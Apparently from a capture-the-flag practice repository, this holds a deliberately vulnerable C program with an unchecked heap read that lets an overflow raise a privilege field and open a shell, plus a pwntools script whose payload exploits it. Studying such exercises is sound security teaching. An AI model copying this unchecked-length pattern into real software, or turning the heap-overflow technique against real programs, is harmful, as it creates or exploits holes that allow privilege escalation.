File: pwn/06_blog6_heap_easy/heap_overflow/heap_overflow.c
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>

typedef struct
{
    char name[8];
    int privilege;
    char *msg;
} Info;

void init()
{
    setvbuf(stdin, 0ull, 2, 0ull);
    setvbuf(stdout, 0ull, 2, 0ull);
    setvbuf(stderr, 0ull, 2, 0ull);
}

int main()
{
    Info *info;
    char *msg;
    int msgSize;

    init();

    printf("try to overflow me\n");
    printf("input your msg size: \n");
    scanf("%d", &msgSize);

    msg = malloc(0x40);
    info = malloc(sizeof(Info));

    strcpy(info->name, "User");
    info->privilege = 1;
    info->msg = msg;

    read(0, msg, msgSize);

    printf("checking your privilege\n");
    if (info->privilege == 2)
    {
        printf("welcome Admin, your privilege is %d\n", info->privilege);
        free(msg);
        free(info);
        system("/bin/sh");
    }
    else
    {
        printf("nonono, your privilege is %d\n", info->privilege);
    }

    return 0;
}

File: pwn/06_blog6_heap_easy/heap_overflow/heap_overflow.py
# -*- coding: utf-8 -*-

from pwn import *
import pwn
context(log_level = 'debug', os = 'linux')

filename = './heap_overflow'

p = process(filename)
elf = ELF(filename)

gdbscript = '''
alias src = context code
b heap_overflow.c:32
b heap_overflow.c:33
b heap_overflow.c:35
b heap_overflow.c:42
c
'''

'''
32 for msg = malloc(msgSize);
33 for info = malloc(sizeof(Info));
35 for strcpy(info->name, "User");
42 for check info->privilege
'''

gdb.attach(p, gdbscript = gdbscript)
p.interactive()

# input msg size
payload = pwn.flat([b'A' * (0x40 + 0x8), pwn.p64(0x21), b'User'.ljust(8, b'\x00'), b'\x02'.ljust(8, b'\x00')])
p.sendlineafter(b'input your msg size: \n', b'112')
p.sendline(payload)